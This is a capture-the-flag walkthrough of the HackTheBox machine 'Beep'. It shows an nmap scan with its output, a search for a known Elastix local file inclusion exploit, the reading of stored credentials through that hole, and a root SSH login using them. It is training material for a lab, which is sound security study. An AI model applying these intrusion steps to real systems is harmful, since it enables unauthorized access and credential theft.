Beep Walkthrough

Hey Everyone! Here we come back with one of HackTheBox machines “Beep”. Before we get started, let’s see machine’s info

It’s easy and based on Linux OS, let’s get started…

DNS Enumeration

At the first we will use nmap to check about the open ports, service running and OS version and other info we will see now

> nmap -A -T4 -oG beep.gnmap 10.10.10.7

-A : service detection, os detection, script results -T4: Threads=4 to increase the speed -oG: to get the output in the extension gnmap to brute force the credentials by brute-spray 

The result is

Nmap scan report for 10.10.10.7Host is up (0.20s latency).Not shown: 988 closed portsPORT      STATE SERVICE    VERSION22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)| ssh-hostkey: |   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)25/tcp    open  smtp       Postfix smtpd|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 80/tcp    open  http       Apache httpd 2.2.3|_http-server-header: Apache/2.2.3 (CentOS)|_http-title: Did not follow redirect to https://10.10.10.7/|_https-redirect: ERROR: Script execution failed (use -d to debug)110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4|_pop3-capabilities: STLS AUTH-RESP-CODE LOGIN-DELAY(0) IMPLEMENTATION(Cyrus POP3 server v2) USER UIDL RESP-CODES APOP TOP PIPELINING EXPIRE(NEVER)111/tcp   open  rpcbind    2 (RPC #100000)143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4|_imap-capabilities: UIDPLUS ANNOTATEMORE ACL IDLE OK THREAD=ORDEREDSUBJECT CATENATE LISTEXT LITERAL+ X-NETSCAPE ATOMIC CONDSTORE LIST-SUBSCRIBED URLAUTHA0001 ID MAILBOX-REFERRALS THREAD=REFERENCES IMAP4 IMAP4rev1 NAMESPACE NO SORT=MODSEQ UNSELECT STARTTLS SORT RENAME RIGHTS=kxte BINARY QUOTA MULTIAPPEND Completed CHILDREN443/tcp   open  ssl/https?|_ssl-date: 2020-12-08T14:07:56+00:00; +3h02m01s from scanner time.993/tcp   open  ssl/imap   Cyrus imapd|_imap-capabilities: CAPABILITY995/tcp   open  pop3       Cyrus pop3d3306/tcp  open  mysql      MySQL (unauthorized)4445/tcp  open  upnotifyp?10000/tcp open  http       MiniServ 1.570 (Webmin httpd)|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:|_clock-skew: 3h02m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Now we have more than one port open so it’s given us more chances to hack this machine from multiple entry points, but we will work on one of them, just take notes about this output and let’s continue…

Website Enumeration

After opening 10.10.10.7 it redirects us to https://10.10.10.7 and now we have a login portal as you can see here

let’s try to find any entry point here like CMS and it may be vulnerable or something like this, let’s take a look at the source code

Now we have 2 keywords we will search for exploitation related to them elastix and palosanto. After searching about palosantoI didn’t find anything so let’s search about elastix by using searchsploit

As you can see here are multiple exploitation, but we will work on the easiest one “LFI” and see what it will lead us to, so open the link, and you will find the exploitation code like this

now we have the LFI full link, after accessing it

we have passwords and usernames but it’s hard to read so open the source code and search for password you will find this password, keep it, for now, we will need it

for now, we have username:root and the password which we have found above.

If you remember from nmap scan there’s port is open, sossh 22 we will try to login to the server with the credentials we have

ssh root@10.10.10.7 or ssh 10.10.10.7 but at the first, I’ve faced a problem with ssh itself as you can see here and after some search, I’ve found the solution here

After resolving the problem, we’re logged in as root through ssh port :) let’s search for the flags…

The root flag is in /root and the user flag is in /home/fanis

Congrats ❤

Stay in touch :)

LinkedIn | GitHub | Twitter